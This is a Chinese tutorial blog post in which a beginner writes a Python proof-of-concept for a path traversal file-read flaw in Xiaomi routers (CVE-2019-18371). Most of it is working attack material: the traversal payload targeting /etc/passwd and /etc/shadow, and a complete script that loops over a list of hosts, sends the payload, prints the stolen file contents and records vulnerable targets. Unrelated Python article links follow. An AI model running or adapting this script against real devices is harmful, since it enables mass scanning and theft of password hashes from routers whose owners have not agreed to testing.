用Python写漏洞验证脚本的代码

更新时间：2022年02月09日 11:47:56 作者：再也没有留恋的斜阳

这篇文章主要介绍了用Python写漏洞验证脚本,本文给大家分享完整实例代码，代码简单易懂，对大家的学习或工作具有一定的参考借鉴价值，需要的朋友可以参考下

小白尝试写任意文件读取poc

我是一个小白，完全不懂Python，但是Python在渗透中往往是一个重要的角色。
有一个CSDN百万大佬写了这样一句话，不会编程的渗透都是耍流氓。
我虽然菜但是也想尝试学习写一下Python漏洞的poc和exp。

我是在网上找到的学习方法，随便记录一下。尝试写一个批量验证漏洞的poc
发现小米路由器有一个任意文件读取漏洞，学着写了看看

小米路由器远程任意文件读取漏洞
小米路由器远程任意文件读取漏洞（CVE-2019-18371）
小米路由器的Nginx的配置文件错误，导致目录穿越漏洞实现任意文件读取。
可通过访问http://domain.cn/xxx…/etc/passwd实现目录穿越访问上级目录及其子目录文件。
如访问http://192.168.1.1/api-third-party/download/extdisks…/etc/passwd 便可以读取到passwd文件。

写一个批量验证漏洞的poc
第一步实现域名和payload拼接
已知payload=/api-third-party/download/extdisks…/etc/passwd

域名和payload拼接如下

import requests
import time
def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        print(poc_url) # 把域名和payload拼接成一个完整的域名,然后去请求如果返回200就说明存在漏洞。
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    poc_check(poc_xiaomi)

图片如下

在这里插入图片描述

拼接好的域名尝试访问，如果返回200代表访问成功说明能读取到文件说明存在漏洞
返回其他的状态码就代表不存在漏洞
完整代码如下：

import requests
import time

def poc_check(poc):
    for url in open('xiaomi.txt'):
        url = url.replace('\n','')
        poc_url=url+poc
        # print(poc_url) # 把域名和payload拼接成一个完整的域名,然后去请求如果返回200就说明存在漏洞。
        try:
            print("再也没有留恋的斜阳")
            print("正在检测:")
            print(poc_url)
            poc_data=requests.get(poc_url)
            if poc_data.status_code==200:
                print(poc_data.content.decode('utf-8'))
                with open(r'xiaomivuln.txt','a+') as f:
                    f.write(poc_url+'\n')
                    f.close()
        except Exception as e:
            time.sleep(0.1)
            pass
if __name__=='__main__':
    poc_xiaomi='/api-third-party/download/extdisks../etc/shadow'
    # poc_xiaomi1='/api-third-party/download/extdisks../etc/passwd'
    poc_check(poc_xiaomi)
    # poc_check(poc_xiaomi1)

在这里插入图片描述

写完了，我太水了的是照着别人写的

到此这篇关于用Python写漏洞验证脚本的文章就介绍到这了,更多相关Python验证脚本内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！

您可能感兴趣的文章:

Django rest framework分页接口实现原理解析
这篇文章主要介绍了Django rest framework分页接口实现原理解析,文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
2020-08-08
Python filter()及reduce()函数使用方法解析
这篇文章主要介绍了Python filter()及reduce()函数使用方法解析,文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
2020-09-09
使用PyWebCopy在Python中克隆网页的操作方法
PyWebCopy是一个用于克隆网页内容的Python库,它允许用户从指定的 URL 复制整个网页并保存到本地,本文将介绍 PyWebCopy 的基本用法,以及如何克隆网页并保存网页内容到本地文件夹,文中通过代码示例讲解的非常详细,需要的朋友可以参考下
2023-12-12
关于pandas.date_range()的用法及说明
这篇文章主要介绍了关于pandas.date_range()的用法及说明，具有很好的参考价值，希望对大家有所帮助。如有错误或未考虑完全的地方，望不吝赐教
2022-07-07
pandas中DataFrame修改index、columns名的方法示例
这篇文章主要介绍了pandas中DataFrame修改index、columns名的方法示例，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2019-08-08
scrapy redis配置文件setting参数详解
这篇文章主要介绍了scrapy redis配置文件setting参数详解，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2020-11-11
Python数据分析之pandas比较操作
比较操作是很简单的基础知识,不过Pandas中的比较操作有一些特殊的点,本文介绍的非常详细,对正在学习python的小伙伴们很有帮助.需要的朋友可以参考下
2021-05-05
利用python的socket发送http(s)请求方法示例
这篇文章主要给大家介绍了关于利用python的socket发送http(s)请求的相关资料，文中通过示例代码介绍的非常详细，对大家学习或者使用python具有一定的参考学习价值，需要的朋友们下面来一起看看吧
2018-05-05
Python 代码调试技巧示例代码
这篇文章主要介绍了Python 代码调试技巧,本文通过实例代码给大家介绍的非常详细，对大家的学习或工作具有一定的参考借鉴价值，需要的朋友可以参考下
2020-08-08
HTML的form表单和django的form表单
这篇文章主要介绍了HTML的form表单和django的form表单,文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
2019-07-07